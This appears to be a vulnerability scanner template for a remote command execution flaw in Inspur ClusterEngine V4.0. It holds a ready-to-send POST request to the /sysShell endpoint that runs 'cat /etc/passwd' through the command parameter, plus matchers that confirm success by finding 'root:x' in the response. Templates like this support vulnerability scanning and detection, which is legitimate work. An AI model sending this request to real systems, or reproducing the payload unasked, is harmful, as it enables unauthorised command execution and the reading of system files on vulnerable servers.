id: ClusterEngine-sysShell-rce

info:
  name: 浪潮ClusterEngineV4.0 sysShell 远程命令执行漏洞
  author: Str1am
  severity: high
  tags: ClusterEngine,rce

requests:
  - raw:
      - |
        POST /sysShell HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        op=doPlease&node=cu01&command=cat /etc/passwd

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "root:x"
        part: body
        condition: and